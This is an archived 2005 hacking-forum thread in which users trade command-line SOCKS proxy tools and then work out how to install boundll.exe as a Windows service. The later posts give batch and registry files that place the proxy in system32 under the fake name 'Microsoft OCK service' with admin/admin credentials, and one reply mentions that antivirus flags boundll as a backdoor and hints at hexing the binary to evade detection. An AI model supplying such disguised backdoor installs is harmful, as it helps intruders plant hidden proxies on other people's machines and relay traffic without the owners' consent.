c°h°
Hi guys,

is there a socks 5 proxy server out there i searched and searched but didnt find any good, if there is no socks 5 socks 4 would also be ok.
It should be installable via command line.


tia

greets ch
NoRRiS
boundll.exe
lev
QUOTE(c°h° @ Jan 21 2005, 04:27 PM)
Hi guys,

is there a socks 5 proxy server out there i searched and searched but didnt find any good, if there is no socks 5 socks 4 would also be ok.
It should be installable via command line.


tia

greets ch
*




hxxp://desproxy.sourceforge.net/

Desproxy-socksserver: a SOCKS Version 4 & 5 server

works well

also squid & delegate (ask mr google) but are more complicated to set up


Jumpi
rps.exe

makes socks4, socks5.
start: rps.exe port max.connections

i'm sure you find it faster in the web then me in my cd's...
The Doom Master
The Program Called Bouncer.exe which by the name u understand..

Usge for Sock5 Proxy:

bouncer.exe --port # --socks5 --s_user {} --s_password {}

read the help inside the file
c°h°
thx4all the nice replys
Kos
hello...

i want to install boundll.exe as service.. my parameter are

@echo off
services createsvrany "Socks5" "Socks Extentions" "%SystemRoot%\system32\w32tnext.exe" "%SystemRoot%\system32\boundll.exe"
regedit /s px.reg
net start Socks5


px.reg

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Socks5\Parameters]
"AppParameters"="boundll.exe --port 9999 --socks5 --daemon"


but it dont work? someone can help me?

thx so far...
The Doom Master
quiet easy mate
create a Service with any name u want with
sc
or srvany/instsrv.exe

create a reg file like this..

CODE

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\(Service Name)]
"Description"="Microsoft OCK service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\(Service Name)\Parameters]
"AppDirectory"="C:\\windows\\system32\\
"Application"="C:\\windows\\system32\\boundll.exe --port # --socks5 --s_user {} --s_password {}"

make sure u use Double slash!!
Rafter
I thought the boundll proxy was recognized as a backdoor/trojan by most of the AVs...
did that change ??

Of course it's not a matter if you've hexed your file wink.gif

Anyway another one you can use and launch per command line is :
http://sourceforge.net/projects/kingate/

A bit more complicated too, but also really nice smile.gif
Kos
hmm i got it so...

the install.bat

@echo off
instsrv.exe OCK %SystemRoot%\system32\boundll.exe
regedit /s px.reg
net start OCK

::::::::::::::::::::::::::::::

the .reg file

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\OCK]
"Description"="Microsoft OCK service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\OCK\Parameters]
"AppDirectory"="%SystemRoot%\\system32\\"
"Application"="%SystemRoot%\\system32\\boundll.exe --port 6666 --socks5 --s_user admin --s_password admin"


dont work? where ist the prob`?
Kos
can someone help plz.. is very important 4 me...

as attachment my files

thx dudes
The Doom Master
mate check this file out.

u need to change the windows directory to which one of ur choice.
cozinata
use delegated for linux systems!
i hope you know how to handle with google tongue.gif
Kos
thx @ The Doom Master

it works great thxxxxxxxx i love u tongue.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.